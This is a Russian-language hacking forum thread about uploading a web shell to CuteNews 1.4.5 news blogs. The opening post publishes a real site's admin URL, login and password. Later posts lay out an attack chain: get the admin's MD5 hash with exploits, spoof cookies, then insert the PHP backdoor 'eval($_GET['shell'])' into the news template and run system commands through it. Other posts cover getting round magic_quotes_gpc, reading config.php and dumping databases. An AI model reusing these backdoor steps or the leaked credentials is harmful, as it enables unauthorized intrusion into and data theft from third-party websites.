Shell CuteNews 1.4.5 Help!

Всем привет!
Вобщем возник вопрос как залить шелл в известный блог новостей (CuteNews) имея данные администратора.
Прочитал много мануалов и эфект нулейвой может ктонить сможет если сможете можете описать как сделали это буду очень признателен
Вот куда я хочу залить шелл.
_ttp://la2.no-ip.org/news/
Login: dsl
Password: 79513159

Заранее спасибо.

 

Оо у мня такаяже прабла немогу понять что нетак делаю. подскажите плиз.

 

Дело в том что я делаю так.
Настройкa блока новостей ->>> Редактировать шаблоны И вижу там


Редактируйте Части Шаблона

Активные новости
Полная версия
Комментарии
Форма добавления комментариев
Предыдущая & Следующая(новости)
Предыдущая & Следующая(коментарий)

Жму Активные новости

Там открывается окошко с следущим содержанием

Я дописываю

Получается так

Потом захожу из этих сылоку куданить

Мне выдаёт ошибку мол

Что делать ваще незнаю

 

Сайт работает и я чуствую что он даже меня переживёт (((

 

ППЦ уже кто-то залез в админку и щас даже шаблон не отредактировать (((

 

А ты смельчак выкладывать логин и пароль в открытый доступ..

 

Это не мой ))

 

М возник еще вопрос.
Дело в том что мне надо слить их базы.
Даныые базы хронятся тут

Как организовать это скажите плиз.

 

Ты бы хотябы основы пхп и хтмл почитал... понял бы сам что к чему

 

Мда спасибо за оригинальный ответ а поточней чёнить сказать можеш ?

 

подключайся навикатом или каким нить скриптом типа пхпмайадмин и делай бакап

 

Это все знают, ток проблемы от базы пасы узнать

 

а конфиг сложно посмотреть ? =\

 

Блин, люди, а давайте подытожим...???
Короче с помощью сплойтов узнаем логин админа и МД5 хеш...если все зер гуд, то есть шанс двигать дальше...так???
Дальше...подменяем куки при помощи Оперы или Мозилы, или и т.д.
Заходим в админку CuteNews...при удачном раскладе вставляем в активные шаблоны код навроде :

HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);
дальше... сохраняем
ИСПОЛЬЗУЕМ:
_http://site/news/show_news.php?shell=phpinfo();
_http://site/news/show_news.php?shell=system(dir);

ПХПИНФО это конечно хорошо)...а как использовать system()???
dir выводит...а вот system(dir c:\); уже фиг(((
варианты: system(dir+c:\) system("dir c:\") system('dir c:\') system('dir', 'c:\') тоже не дают результата....где-то не догоняю чего-то?

P.S. Например хочу прочитать файл config.php, тогда команда для винды будет type config.php...либо cmd /c type config.php... вобщем любые варианты со скобками и кавычками результата не дают положительного...
Выдает ошибку примерно такую(это если кавычки использовать):

 

Вобщем поискав в инете, вроде бы выходит, что все дело в том, что на серве включено magic_quotes_gpc...Обойти это как-то можно?

 

Блин, ну кто-нибудь...подскажите, как обойти вставку \ ...из-за magic_quotes_gpc=ON вместо подозрительных символов (пробел,",' и т.д.) подставляется \.Что-нибудь можно сделать вообще?
Серв в локальной сети.Я его вижу, а у него в мою зону доступа нет и в ИНЕТ нет доступа, так что XSS не катит(.ПЛИЗ..ПОКА НЕ ПРИКРЫЛИ...

 

Спасибо, что откликнулись))))
Я сам уже догадался...)
Реально удовольствие от собственных побед НАМНОГО БОЛЬШЕ!!!)

 

Ну ппц Я ж писал уже...
Дописываем в конце Active News:

Заходим на http://уязвимый_сервер.ru/sk.php - и лазим по чужому компу...
У кого не получиться пм...

 

Я ж писал, что нет возможности выполнить XSS)))....Но все зер ГУД)...Через Чары проблему решил)

 

Народ не подскажете как пасс достать админа в кут нюс, эксплоит или че нить, ссылочку =)